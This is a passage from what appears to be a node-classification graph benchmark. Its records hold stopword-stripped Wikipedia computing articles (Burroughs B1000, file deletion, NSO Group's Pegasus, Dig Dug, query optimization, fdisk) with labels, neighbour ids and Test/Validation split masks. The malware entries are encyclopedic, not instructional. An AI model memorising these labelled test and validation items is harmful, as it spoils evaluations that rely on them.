language appearance output alu appear different addressable registers x+y x-y two read-only registers within machine language one concession fact burroughs primarily supplier business thus running cobol availability bcd arithmetic alu internally machines employed 16-bit instructions 24-bit data path bit addressable memory supported mix quite efficiently internally later generation memories stored data 32-bit boundaries capable reading across boundary supplying merged result initial hardware implementations built ctl family originally made fairchild semiconductor introduction b1955 1979 series employed popular readily obtainable ttl logic family b1955 control logic implemented proms muxes b1965 last series implemented pair microcode sequencers stayed lock step majority instructions executed single cycle first cycle decoded fplas using 16 inputs perfect size 16-bit instruction word 48 min-terms successive cycles multi-cycle instruction sourced proms fplas prom outputs wired together fpla would drive output first cycle get tri-stated proms would drive control lines completion instruction i/o system b1000 series consisted 24-bit data path control strobes peripherals cpu would place data data path inform peripheral data present many peripheral adapters fairly simplistic cpu actually drove adapter state machines operations successive accesses later models machines 1800 1900 series could configured either single dual processor tightly coupled machines competed access main memory b1955 b1965 could accommodate four processors memory bus least one would assigned multi-line adapter supplied serial i/o system dual-processor configurations ever actually sold multi-line capable driving multiple 19.2kb rs485 serial lines multi-drop configuration serial i/o polled given terminal would wait addressed grab line send data pending multi-line adapter would dma data main memory linked list format consequently processors n't deal serial i/o interrupt issues taken care fact block mode terminals type supported b1000 series could address maximum 2 megabytes memory days multiple gigabytes sounds fairly limiting commercial installations got hundreds kilobytes storage",
    "neighbors": [
      512,
      8001,
      2243,
      3716,
      7173,
      1702,
      2477,
      3886,
      4465,
      2002,
      5714,
      9714,
      11059,
      3960,
      2811
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2534,
    "label": 6,
    "text": "File_deletion:file deletion file deletion way removing file computer file system examples reasons deleting files operating systems include commands deleting files rm unix era cp/m dr-dos del/erase ms-dos/pc dos dr-dos microsoft windows etc. file managers also provide convenient way deleting files files may deleted one-by-one whole directory tree may deleted common problem deleting files accidental removal information later proves important one way deal back files regularly erroneously deleted files may found archives another technique often used delete files instantly move temporary directory whose contents deleted recycle bin trash works microsoft windows apple macos well linux distributions employ strategy ms-dos one use undelete command ms-dos deleted files really deleted marked deleted—so could undeleted time disk blocks used eventually taken files data recovery programs work scanning files marked deleted space freed per byte rather per file sometimes cause data recovered incompletely defragging drive may prevent undeletion blocks used deleted file might overwritten since marked empty another precautionary measure mark important files read-only many operating systems warn user trying delete files file system permissions exist users lack necessary permissions able delete files preventing erasure people work critical system files unix-like operating systems order delete file one must usually write permission parent directory file common problem sensitive data deleted files really erased may recovered interested parties file systems remove link data see undelete even overwriting parts disk something else formatting may guarantee sensitive data completely unrecoverable special software available overwrites data modern post-2001 ata drives include secure erase command firmware however high security applications high-security enterprises sometimes require disk drive physically destroyed ensure data recoverable microscopic changes head alignment effects mean even measures guaranteed data encrypted encryption key unavailable crypto-shredding practice 'deleting data deleting overwriting encryption keys",
    "neighbors": [
      2432,
      3972,
      2824,
      6797,
      8729,
      9762,
      8997,
      3366,
      1193,
      7983,
      11695,
      178,
      7090,
      4409,
      831,
      1475,
      7369,
      9166,
      4435,
      10195,
      2779,
      6494,
      1509,
      6120,
      11368,
      5619,
      5492,
      11251,
      9086
    ],
    "mask": "None"
  },
  {
    "node_id": 2535,
    "label": 3,
    "text": "Berkeley_IRAM_project:berkeley iram project 1996–2004 research project computer science division university california berkeley berkeley iram project explored computer architecture enabled wide bandwidth memory processor made possible designed integrated circuit chip since envisioned chip would consist primarily random-access memory ram smaller part needed central processing unit cpu research team used term intelligent ram iram describe chip architecture like j–machine project mit primary objective research avoid von neumann bottleneck occurs connection memory cpu relatively narrow memory bus separate integrated circuits strong competitive pressures technology employed component computer system—principally cpu memory offline storage—is typically selected minimize cost needed attain given level performance though microprocessor memory implemented integrated circuits prevailing technology used differs microprocessor technology optimizes speed memory technology optimizes density reason integration memory processor chip part limited static random-access memory sram may implemented using circuit technology optimized logic performance rather denser lower-cost dynamic random-access memory dram microprocessor access off-chip memory costs time power however significantly limiting processor performance reason computer architecture employing hierarchy memory systems developed static memory integrated microprocessor temporary easily accessible storage cache data also retained off-chip dram since on-chip cache memory redundant presence adds cost power purpose iram research project find computing applications better trade-off cost performance could achieved architecture dram integrated on-chip processor thus eliminating need redundant static memory cache—even though technology used optimum dram implementation fair say berkeley iram achieve recognition berkeley risc received iram project nevertheless influential although initial iram proposals focused trade-offs cpu dram iram research came concentrate vector instruction sets publications early advocates incorporation vector processing vector instruction sets microprocessors several commercial microprocessors intel avx subsequently adopted vector processing instruction set extensions",
    "neighbors": [
      1376,
      833,
      9932,
      10285,
      2383,
      1776,
      4144
    ],
    "mask": "None"
  },
  {
    "node_id": 2536,
    "label": 7,
    "text": "Aiyara_cluster:aiyara cluster aiyara cluster low-powered computer cluster specially designed process big data aiyara cluster model considered specialization beowulf cluster sense aiyara also built commodity hardware inexpensive personal computers system-on-chip computer boards unlike beowulf applications aiyara cluster scoped big data area scientific high-performance computing another important property aiyara cluster low-power must built class processing units produces less heat name aiyara originally referred first arm-based cluster built wichai srisuruk chanwit kaewkasi suranaree university technology name aiyara came thai word literally elephant reflect underneath software stack apache hadoop like beowulf aiyara cluster define particular software stack run atop cluster normally runs variant linux operating system commonly used big data software stacks apache hadoop apache spark report aiyara hardware successfully processed non-trivial amount big data published proceedings icsec 2014 aiyara mk-i second aiyara cluster consists 22 cubieboards first known soc-based arm cluster able process big data successfully using spark hdfs stack aiyara cluster model technical description explaining build aiyara cluster later published chanwit kaewkasi dzone 2014 big data guide results cluster optimization techniques make cluster processing rate boost 0.9 gb/min still preserve low-power consumption reported proceeding ieee tencon 2014",
    "neighbors": [
      785,
      7699,
      7963,
      6815,
      5798,
      9126,
      6184,
      2345,
      4909,
      7218,
      8501,
      823,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      330,
      1866,
      8523,
      4308,
      344,
      2264,
      731,
      2140,
      11487,
      4194,
      5090,
      7142,
      8810,
      9964,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 2537,
    "label": 9,
    "text": "Language_workbench:language workbench language workbench tool set tools enables software development language-oriented programming software development paradigm language workbench typically include tools support definition reuse composition domain-specific languages together integrated development environment language workbenches introduced popularized martin fowler 2005 language workbenches usually support",
    "neighbors": [
      7777,
      4293,
      9926,
      2666,
      1552,
      11475,
      6581
    ],
    "mask": "None"
  },
  {
    "node_id": 2538,
    "label": 4,
    "text": "Brain_Test:brain test brain test piece malware masquerading android app tested users iq brain test discovered security firm check point available google play app store 15 september 2015 check point described brain test new level sophistication malware brain test uploaded two separate occasions com.zmhitlte.brain com.mile.brain starting august 2015 times google bouncer failed detect malware first removal 24 august 2015 software reintroduced using obfuscation technique tim erin tripwire said bypassing vetting processes apple google keystone mobile malware campaign malware turned include rootkit revelation described cunning first thought malware thought written chinese actor according shaulov check point based use packing/obfuscation tool baidu eleven paths telefonica-owned company found links may pieces malware based id used access umeng internet domains accessed apps shared jpg png images appears app first detected nexus 5 using check point mobile threat prevention system fact system unable remove malware alerted software company researchers unusual threat according check point may necessary re-flash rom device brain test successfully installed reinstaller system directory malware uploaded two forms packing feature present second",
    "neighbors": [
      9800,
      4649,
      5261,
      8668,
      1299,
      3353,
      7515,
      700,
      8413,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 2539,
    "label": 4,
    "text": "Managed_security_service:managed security service computing managed security services mss network security services outsourced service provider company providing service managed security service provider mssp roots mssps internet service providers isps mid late 1990 ’ initially isp would sell customers firewall appliance customer premises equipment cpe additional fee would manage customer-owned firewall dial-up connection according recent industry research organizations 74 manage security in-house 82 professionals said either already partnered plan partner managed security service provider businesses turn managed security services providers alleviate pressures face daily related information security targeted malware customer data theft skills shortages resource constraints managed security services mss also considered systematic approach managing organization security needs services may conducted in-house outsourced service provider oversees companies network information system security functions managed security service include round-the-clock monitoring management intrusion detection systems firewalls overseeing patch management upgrades performing security assessments security audits responding emergencies products available number vendors help organize guide procedures involved diverts burden performing chores manually considerable away administrators industry research firm forrester research identified 14 significant vendors global market 2018 23-criteria evaluation managed security service providers mssps -- identifying accenture ibm dell secureworks trustwave verizon deloitte wipro others leaders mssp market newcomers market include number smaller providers used protect homes small business high networth clients early example outsourced off-site mssp service us west nteract internet security security service ’ require customer purchase equipment security equipment installed customers premises service considered mssp offering us west retained ownership firewall equipment firewalls operated internet point presence pop service based check point firewall-1 equipment following year long beta introduction period service generally available early 1997 service also offered managed virtual private networking vpn encryption security launch customized assistance assessment business risks key business requirements security development security policies processes may include comprehensive security architecture assessments design include technology business risks technical risks procedures consulting may also include security product integration on-site mitigation support intrusion occurred including emergency incident response forensic analysis service involves installing upgrading managing firewall virtual private network vpn and/or intrusion detection hardware software electronic mail commonly performing configuration changes behalf customer management includes monitoring maintaining firewall traffic routing rules generating regular traffic management reports customer intrusion detection management either network level individual host level involves providing intrusion alerts customer keeping date new defenses intrusion regularly reporting intrusion attempts activity content filtering services may provided email filtering data traffic filtering clearly managed service product resale major revenue generator many mss providers category provides value-added hardware software variety security-related tasks one service may provided archival customer data day-to-day monitoring interpretation important system events throughout network—including unauthorized behavior malicious hacks denial service dos anomalies trend analysis first step incident response process includes one-time periodic software scans hacking attempts order find vulnerabilities technical logical perimeter generally assess security throughout network accurately reflect personnel-related exposures due disgruntled employees social engineering etc regularly reports given client includes monitoring event logs intrusions change management service identify changes system violate formal security policy example rogue administrator grants much access system short measures compliance technical risk model decision criteria engaging services mssp much form outsourcing cost-effectiveness compared in-house solutions focus upon core competencies need round-the-clock service ease remaining up-to-date important factor specific mss outsourcing network security hands critical control company infrastructure outside party mssp whilst relieving ultimate responsibility errors client mssp still ultimate responsibility security must prepared manage monitor mssp hold accountable services contracted relationship mssp client turnkey one although organization remains responsible defending network information security related business risks working mssp allows organization focus core activities remaining protected network vulnerabilities business risks result information assets upon business depends securely configured managed resulting asset compromise due violations confidentiality availability integrity compliance specific government-defined security requirements achieved using managed security services business model behind managed security services commonplace among large enterprise companies security experts model later adapted fit medium-sized smaller companies smbs organizations 500 employees 100 employee one site value-added reseller var community either specializing managed security offering extension managed service solutions smbs increasingly turning managed security services number reasons chief among specialized complex highly dynamic nature security growing number regulatory requirements obliging businesses secure digital safety integrity personal information financial data held transferred via computer networks whereas larger organizations typically employ specialist department organizations smaller scale distributed location businesses medical dental offices attorneys professional services providers retailers typically employ full-time security specialists although frequently employ staff external consultants organizations many constrained budget limitations address combined issues lack expertise lack time limited financial resources emerging category managed security service provider smb arisen organizations across sectors shifting managed security services traditional in-house security practices trend outsourcing security jobs managed security services vendors picking appreciable pace also helps enterprises focus core business activities strategic approach effective management cost-effectiveness seamless monitoring major drivers fueling demand services increase participation leading companies worldwide end user enterprises gaining confidence outsourcing security services providers category tend offer comprehensive security services delivered remotely managed appliances devices simple install run part background fees normally highly affordable reflect financial constraints charged monthly basis flat rate ensure predictability costs service providers deliver daily weekly monthly exception-based reporting depending client ’ requirements security tuning firewall tuning/ ids tuning/ siem tuning today security become power weapon cyberattacks become highly sophisticated enterprises toil keep par new malware deviant e-mail spoofing fraud gambit among different prominent players managed security service provider observe growing need combat increasingly complicated intended attacks response vendors busy enhancing sophistication solution many cases winning security expert expand portfolio besides increasing regulatory compliance associated protection citizen ’ data worldwide likely stimulate enterprises ensure high data-security level frontrunners engaging managed security services financial services telecom information technology etc maintain competitive edge mss vendors focusing refining product offering technologies deployed clients another crucial factor profitability remains capability lower cost yet generate revenue avoiding deployment additional tools simplifying service creation integration products ensures unprecedented visibility well integration besides mss market would witness tremendous growth regions north america europe asia –pacific latin america middle east africa",
    "neighbors": [
      2953,
      5774,
      5245,
      8998,
      939,
      3629,
      7352,
      10574,
      10196,
      7515,
      8668,
      9053,
      94,
      11611,
      3941,
      5749,
      4471,
      3323,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2540,
    "label": 3,
    "text": "Dig_Dug:dig dug dig dug programmed shouichi fukatani worked many namco earlier arcade titles designed junior colleagues galaga creator shigeru yokoyama music composed yuriko keino becoming first game worked namco — short jingle made character moved made executives wanted walking sound game described strategic digging game namco large amount strategy used defeat enemies heavily used game marketing upon release dig dug well-received critics addictive gameplay cute characters strategy popular title golden age arcade video games met long series sequels spin-offs several platforms alongside ports home consoles digital storefronts dig dug also included many namco video game compilations number systems characters game appear throughout mr. driller series based dig dug gameplay dig dug maze video game controlling titular character player objective eliminate enemies screen pookas red tomato-like creatures comically large goggles fygars green dragons breathe fire dig dug defeat enemies using bike pump inflate air explode crushing large falling rocks bonus points awarded squashing multiple enemies single rock dropping two rocks stage cause bonus item appear middle screen eaten points enemies defeated dig dug progress next stage enemies travel solid dirt reach player eyes shown inflated enemies pose threat player allowing dig dug pass without harm game play short jingle dig dug moves abruptly stopping becomes idle player takes long clear stage enemies become faster much aggressive indicated short jingle stages indicated number flowers placed top screen later stages feature variations color dirt increasing movement speed enemies dig dug first released japan namco april 19 1982 later released north america europe atari inc. later year game programmed shouichi fukatani worked many company earlier arcade titles died 1985 ran namco galaga arcade system modified shigeichi ishimura described namco strategic digging game amount strategy used defeat enemies heavily used game marketing music composed yuriko keino first video game namco worked — idea music played character moved inspired development team want add walking sound player instead replaced short jingle many developers junior colleagues galaga creator shigeru yokoyama helped supervise project first home conversion dig dug released atari 2600 1983 developed published atari followed versions atari 5200 colecovision atari 8-bit family commodore 64 apple ii japan game ported casio pv-1000 1983 later msx 1984 nintendo family computer 1985 gakken produced handheld lcd tabletop game 1983 replaced dig dug air pump flamethrower accommodate hardware limitations namco released game boy conversion north america 1992 featured all-new game called new dig dug player must collect keys open exit door — version later included 1996 japan-only compilation namco gallery vol 3 also included galaxian tower druaga famista 4 japanese sharp x68000 version developed dempa released 1995 bundled dig dug ii dig dug included several namco video game compilations including namco museum vol 3 1996 namco museum 64 1999 namco museum 50th anniversary 2005 namco museum remix 2007 namco museum essentials 2009 namco museum switch 2017 game released digitally xbox live arcade 2006 featuring support online leaderboards achievements added xbox one backwards compatibility lineup 2016 version japanese wii virtual console released 2009 dig dug also included bonus game pac-man party alongside arcade versions pac-man galaga dig dug critical commercial success upon release praised strategy gameplay character designs sold 22,228 arcade units north america end 1982 grossing us 46.3 million revenue popular title golden age arcade video games american publication blip magazine favorably compared games pac-man defender simple controls fun gameplay allgame called arcade nes classic praising characters gameplay unique premise easily translatable home platforms japanese magazine gamest called one greatest arcade games time 1998 applauding addictiveness breaking traditional dot-eater gameplay used titles pac-man rally-x 2007 retrospective eurogamer praised perfect gameplay strategy saying one memorable legendary videogame releases past 30 years killer list videogames rated six popular coin-op game website electronic fun computers games praised atari 8-bit version retaining entertaining gameplay arcade version simple controls reviewing xbox live arcade digital re-release ign liked presentation leaderboards achievements noting still extremely fun addicting game recommending fans original newcomers gamespot similar response praising xbla version colorful artwork retaining original arcade gameplay eurogamer applauded game addictiveness still holding years release home versions game would receive criticism quality lack exclusive content readers softline magazine ranked dig dug tenth-worst apple ii fourth-worst atari 8-bit video game 1983 subpar quality living consumer expectations eurogamer ign gamespot criticized xbla conversion lack online multiplayer achievements easy unlock eurogamer particular criticizing game controls sometimes unresponsive dig dug met long series sequels several platforms first dig dug ii released 1985 less successful game opted overhead perspective instead digging earth dig dug drills along fault lines sink pieces island ocean 1996 remake game dig dug arrangement released arcades alongside original namco classic collection vol 2 arcade collection added new enemies music power-ups boss fights two-player co-operative play 3d followup titled dig dug deeper published infogrames 2001 windows nintendo ds sequel released 2005 combining elements first two games adding narrative link mr. driller series massively-multiplayer online game dig dug island publicly released 2008 online version dig dug ii game lasted year servers shuttered 2009 two dig dug -themed slot machines produced japanese company oizumi 2003 small lcd monitors featuring animations dig dug characters webcomic adaptation game produced 2012 shiftylook subsidiary bandai namco focused reviving older namco game franchises drawn several different artists lasting nearly 200 issues concluding 2014 following closure shiftylook character dig dug renamed taizo hori play japanese phrase horitai zo meaning want dig would become prominent character namco mr. driller series retconned father susumu hori married baraduke protagonist masuyo tobi would divorce unknown reasons taizo appears playable character namco super wars wonderswan color namco × capcom playstation 2 released japan taizo appears now-defunct web browser game namco high principal titular high school simply known president dig dug pookas would appear several namco video games including sky kid 1985 pac-man world 1999 pro baseball famista ds 2011 2011 super smash bros. nintendo 3ds wii u 2014",
    "neighbors": [
      11522,
      1060,
      9093,
      9006,
      10287,
      1776,
      10544,
      10066,
      10931,
      6452,
      5717,
      8663,
      5753,
      3039
    ],
    "mask": "None"
  },
  {
    "node_id": 2541,
    "label": 9,
    "text": "Southampton_BASIC_System:southampton basic system southampton basic system sobs dialect basic programming language developed used ict 1900 series computers late 1960s early 1970s implemented minimop operating system university southampton also ran maximop operated teletype terminal though crt terminals could also used common many early implementations basic sobs needed lines line numbers allow user add new lines program desired place also targets codice_1 codice_2 statements codice_3 facility available allow sections code renumbered default increments 10 allow space middle program line numbers numeric values represented internally floating point language relatively statements comparison modern programming languages note particular lack codice_4-like statement codice_5 looping construct available programmers variable names numeric values either single letter single letter followed single numeric digit thus allowing 286 discreet variables total strings supported variable names restriction followed pound codice_6 symbol limited number numeric functions provided took one numeric parameter support strings limited one function codice_7 returned length string parameter sub-strings supported square brackets codice_8 referred sub-string string codice_9 2nd character 3rd character inclusive would print codice_10 syntax also supported left-hand side assignment would print codice_11 support handling arrays data relatively strong codice_12 statements able read entire array codice_13 statements perform useful matrix operations matrix addition matrix subtraction matrix multiplication finding inverse matrix square matrix example output would sobs primitive debugging capabilities limited mostly codice_14 statement codice_15 would cause interpreter print line number executed",
    "neighbors": [
      3718,
      3594,
      7691,
      1805,
      9997,
      786,
      11412,
      406,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      5455,
      1879,
      92,
      11229,
      5730,
      2915,
      9188,
      5733,
      11243,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2542,
    "label": 4,
    "text": "NSO_Group:nso group nso group technologies israeli technology firm focused cyber intelligence founded 2010 niv carmi omri lavie shalev hulio reportedly employs around 500 people based herzliya near tel aviv annual revenues said around 40 million 2013 150 million 2015 june 2017 company put sale 1 billion francisco partners management founders lavie hulio partnering european private equity fund novalpina capital purchased majority stake nso february 2019 according company nso provides authorized governments technology helps combat terror crime claims software created nso group used targeted attacks human rights activists journalists several countries nso founders said ex-members unit 8200 israeli intelligence corps unit responsible collecting signals intelligence company start-up funding came group investors headed eddy shalev partner venture capital fund genesis partners group invested total 1.8 million dollars 30 stake 2012 government mexico announced signing 20 million contract nso 2015 company reportedly sold surveillance technology government panama contract became subject panamanian anti-corruption investigation following disclosure leak confidential information italian firm hacking team 2014 american private equity firm francisco partners bought company 130 million reported 2015 francisco seeking sell company 1 billion company officially put sale 1 billion june 2017 roughly ten times francisco originally paid 2014 february 14 2019 francisco partners sold 60 majority stake nso back co-founders shalev hulio omri lavie supported purchase novalpina capital hulio lavie invested 100 million novalpina acquiring remaining portion majority stake thus valuing company approximately 1 billion day acquisition novalpina attempted address concerns raised citizen lab letter stating belief nso operates sufficient integrity caution april 2019 nso froze deals saudi arabia scandal alleging nso software role tracking slain journalist jamal khashoggi months death may 2019 exploit whatsapp alleged developed nso whatsapp told financial times broke news attack hallmarks private company known work governments deliver spyware reportedly takes functions mobile phone operating systems nso denied involvement selecting targeting victims explicitly denied creating exploit august 25 2016 citizen lab lookout revealed software known pegasus created nso used target human rights activist ahmed mansoor united arab emirates mansoor informed citizen lab researchers bill marczak john scott-railton iphone 6 targeted august 10 2016 means clickable link sms text message analysis citizen lab lookout discovered link downloaded software exploit three previously unknown unpatched zero-day vulnerabilities ios according analysis software jailbreak iphone malicious url opened form attack known spear phishing software installs collects communications locations targeted iphones including communications sent imessage gmail viber facebook whatsapp telegram skype software also collect wi-fi passwords researchers noticed software code referenced nso group product called pegasus leaked marketing materials pegasus previously come light leak records hacking team indicated software supplied government panama 2015 researchers claim mexican journalist rafael cabrera also targeted software could used israel turkey thailand qatar kenya uzbekistan mozambique morocco yemen hungary saudi arabia nigeria bahrain citizen lab lookout notified apple security team patched flaws within ten days released update ios patch macos released six days later 2017 citizen lab researchers revealed nso exploit links may sent mexican scientists public health campaigners targets supported measures reduce childhood obesity including mexico soda tax july 2017 international team assembled investigate 2014 iguala mass kidnapping publicly complained thought surveilled mexican government claim mexican government used pegasus send messages funeral homes containing links clicked allowed government surreptitiously listen investigators mexican government repeatedly denied unauthorized hacking june 2018 israeli court indicted former employee nso group allegedly stealing copy pegasus attempting sell online 50 million worth cryptocurrency december 2018 new york times investigation concluded pegasus software played role murder jamal khashoggi friend khashoggi claimed filing saudi authorities used israeli-made software spy dissident citizen lab researchers reported october 2018 targeted undercover operatives connected nso citizen lab previously reported use nso software spy inner circle jamal khashoggi murder citizen lab october report revealed nso signature spy software placed iphone saudi dissident omar abdulaziz one khashoggi ’ confidantes months abdulaziz claimed software revealed khashoggi private criticisms saudi royal family abdulaziz claimed played major role kashoggi death ap report incident could find direct evidence connecting operative surveillance citizen lab ’ researchers nso nso denied involvement phone joaquín guzmán known el chapo hacked using nso software 2011 mexican president felipe calderón reportedly called nso thank company role guzmán capture",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      6186,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      2734,
      9904,
      9395,
      8886,
      7869,
      3789,
      4304,
      3286,
      4314,
      9435,
      4318,
      3807,
      4830,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      3944,
      3956,
      9082,
      2945,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      7096,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      8172,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 2543,
    "label": 7,
    "text": "Casebook_PBC:casebook pbc casebook pbc us cloud computing public-benefit corporation headquartered new york city incubated annie e. casey foundation company initially developed child welfare solutions since expanded provide saas platform servicing whole human services casebook initially started project annie e. casey foundation leadership kathleen feely vice-president innovation foundation early success private service providers software spun non-profit organization known case commons 2012 indiana department child services first state agency implement casebook mobile web-based solution child welfare caseworkers effort led organization receiving design experience award 2014 code america technology award 2015 2017 organization helped state california child welfare digital services agency learn build ship software year leadership new ceo tristan louis casebook pbc entered national partnership kpmg allowing kpmg leverage casebook platform exclusive solution child welfare vertical rebranded case commons casebook pbc company offers casebook platform set core components used variety human services software developments historical background child welfare space company also offers suite applications put together allow states assemble ccwis-ready child welfare system official company site casebook pbc certified b-corp",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 2544,
    "label": 1,
    "text": "Query_optimization:query optimization query optimization function many relational database management systems query optimizer attempts determine efficient way execute given query considering possible query plans generally query optimizer accessed directly users queries submitted database server parsed parser passed query optimizer optimization occurs however database engines allow guiding query optimizer hints query request information database simple finding address person ss 123-45-6789 complex like finding average salary employed married men california ages 30 39 earn less wives queries results generated accessing relevant database data manipulating way yields requested information since database structures complex cases especially not-very-simple queries needed data query collected database accessing different ways different data-structures different orders different way typically requires different processing time processing times query may large variance fraction second hours depending way selected purpose query optimization automated process find way process given query minimum time large possible variance time justifies performing query optimization though finding exact optimal way execute query among possibilities typically complex time consuming may costly often practically impossible thus query optimization typically tries approximate optimum comparing several common-sense alternatives provide reasonable time good enough plan typically deviate much best possible result trade-off amount time spent figuring best query plan quality choice optimizer may choose best answer different qualities database management systems different ways balancing two cost-based query optimizers evaluate resource footprint various query plans use basis plan selection assign estimated cost possible query plan choose plan smallest cost costs used estimate runtime cost evaluating query terms number i/o operations required cpu path length amount disk buffer space disk storage service time interconnect usage units parallelism factors determined data dictionary set query plans examined formed examining possible access paths e.g. primary index access secondary index access full file scan various relational table join techniques e.g. merge join hash join product join search space become quite large depending complexity sql query two types optimization consist logical optimization—which generates sequence relational algebra solve query—and physical optimization—which used determine means carrying operation query optimizers represent query plans tree plan nodes plan node encapsulates single operation required execute query nodes arranged tree intermediate results flow bottom tree top node zero child nodes—those nodes whose output fed input parent node example join node two child nodes represent two join operands whereas sort node would single child node input sorted leaves tree nodes produce results scanning disk example performing index scan sequential scan performance query plan determined largely order tables joined example joining 3 tables b c size 10 rows 10,000 rows 1,000,000 rows respectively query plan joins b c first take several orders-of-magnitude time execute one joins c first query optimizers determine join order via dynamic programming algorithm pioneered ibm system r database project algorithm works two stages sort order avoid redundant sort operation later processing query second particular sort order speed subsequent join clusters data particular way sql query modern relational dbms selections joins particular sql queries often nest several layers spj blocks select-project-join means group exists exists operators cases nested sql queries flattened select-project-join query always query plans nested sql queries also chosen using dynamic programming algorithm used join ordering lead enormous escalation query optimization time database management systems use alternative rule-based approach uses query graph model one hardest problems query optimization accurately estimate costs alternative query plans optimizers cost query plans using mathematical model query execution costs relies heavily estimates cardinality number tuples flowing edge query plan cardinality estimation turn depends estimates selection factor predicates query traditionally database systems estimate selectivities fairly detailed statistics distribution values column histograms technique works well estimation selectivities individual predicates however many queries conjunctions predicates query predicates often highly correlated example codice_1 implies codice_2 hard estimate selectivity conjunct general poor cardinality estimates uncaught correlation one main reasons query optimizers pick poor query plans one reason database administrator regularly update database statistics especially major data loads/unloads classical query optimization assumes query plans compared according one single cost metric usually execution time cost query plan calculated without uncertainty assumptions sometimes violated practice multiple extensions classical query optimization studied research literature overcome limitations extended problem variants differ model cost single query plans terms optimization goal classical query optimization associates query plan one scalar cost value parametric query optimization assumes query plan cost depends parameters whose values unknown optimization time parameters instance represent selectivity query predicates fully specified optimization time provided execution time parametric query optimization therefore associates query plan cost function maps multi-dimensional parameter space one-dimensional cost space goal optimization usually generate query plans could optimal possible parameter value combinations yields set relevant query plans run time best plan selected set true parameter values become known advantage parametric query optimization optimization general expensive operation avoided run time often cost metrics addition execution time relevant compare query plans cloud computing scenario instance one compare query plans terms much time take execute also terms much money execution costs context approximate query optimization possible execute query plans randomly selected samples input data order obtain approximate results reduced execution overhead cases alternative query plans must compared terms execution time also terms precision reliability data generate multi-objective query optimization models cost query plan cost vector vector component represents cost according different cost metric classical query optimization considered special case multi-objective query optimization dimension cost space i.e. number cost vector components one different cost metrics might conflict e.g. might one plan minimal execution time different plan minimal monetary execution fees cloud computing scenario therefore goal optimization find query plan minimizes cost metrics must find query plan realizes best compromise different cost metrics best compromise depends user preferences e.g. users might prefer cheaper plan others prefer faster plan cloud scenario goal optimization therefore either find best query plan based specification user preferences provided input optimizer e.g. users define weights different cost metrics express relative importance define hard cost bounds certain metrics generate approximation set pareto-optimal query plans i.e. plans plan better cost according metrics user select preferred cost tradeoff plan set multi-objective parametric query optimization generalizes parametric multi-objective query optimization plans compared according multiple cost metrics plan costs may depend parameters whose values unknown optimization time cost query plan therefore modeled function multi-dimensional parameter space multi-dimensional cost space goal optimization generate set query plans optimal possible combination parameter values user preferences",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      10899,
      2456,
      1049,
      4376,
      5403,
      5658,
      9112,
      10137,
      4255,
      9248,
      9631,
      9634,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      2246,
      9286,
      2632,
      11030,
      9290,
      6219,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      4065,
      7523,
      9828,
      10340,
      10471,
      8808,
      6124,
      2669,
      6383,
      10737,
      9075,
      7412,
      7159,
      1146,
      3323,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 2545,
    "label": 6,
    "text": "Fdisk:fdisk computer file systems fdisk command-line utility provides disk partitioning functions available dos dr flexos ibm os/2 microsoft windows operating systems certain ports freebsd netbsd openbsd dragonfly bsd macos compatibility reasons versions windows nt operating system line windows 2000 onwards replaced advanced tool called codice_1 similar utilities exist unix-like systems example bsd disklabel ibm introduced fixed disk setup program version 1.00 march 1983 release ibm pc/xt first pc store data hard disk ibm personal computer dos version 2.0 version 1 could used create one fat12 dos partition delete change active partition display partition data writes master boot record supported four partitions three intended operating systems cp/m-86 xenix expected partitioning utilities support august 1984 pc dos 3.0 added fat16 partitions support larger hard disks efficiently april 1987 pc dos/fdisk 3.30 added support extended partitions could hold 23 logical drives volumes ibm pc dos 7.10 contained utilities command available ms-dos versions 3.2 later support fat16b added compaq ms-dos 3.31 later became available ms-dos/pc dos 4.0 dos programs including program came original windows 95 capable creating fat partitions types fat12 fat16 fat16b derivative ms-dos provided windows 95 windows 98 later windows versions shipping windows 95b later able manipulate fat32 partitions windows 2000 later use logical disk manager feature well unlike programs operating systems programs dos windows 9x/me alter data partition table also overwrite many sectors data partition however create extended partition partition editor must put extended boot records logical drive disk users must sure correct disk/partition chosen using dos/windows partitioning switch undocumented well known repairing master boot record supplied windows 95 report correct size hard disk larger 64 gb updated available microsoft corrects microsoft named replacement 263044usa8 version 4.72.2811.0 signature may 23 2000 original windows 98 program size smaller updated one os/2 shipped two partition table managers version 4.0 text mode fdisk gui-based fdiskpm two identical functionality manipulate fat partitions advanced hpfs partitions os/2 versions 4.5 higher including ecomstation use jfs filesystem well fat hpfs replace logical volume manager lvm dr dos 6.0 flexos include implementation command implementation freedos free software freedos version developed brian e. reifsnyder paragon technology systems pts-dos 2000 pro includes implementation mach operating system written robert baron ported 386bsd julian elischer implementation used freebsd netbsd dragonfly bsd 2019 well early versions openbsd 1995 1997 openbsd 2.2 tobias weingartner re-wrote 1997 openbsd 2.2 subsequently forked apple computer inc 2002 still used basis macos 2019 native partitions bsd systems traditionally use bsd 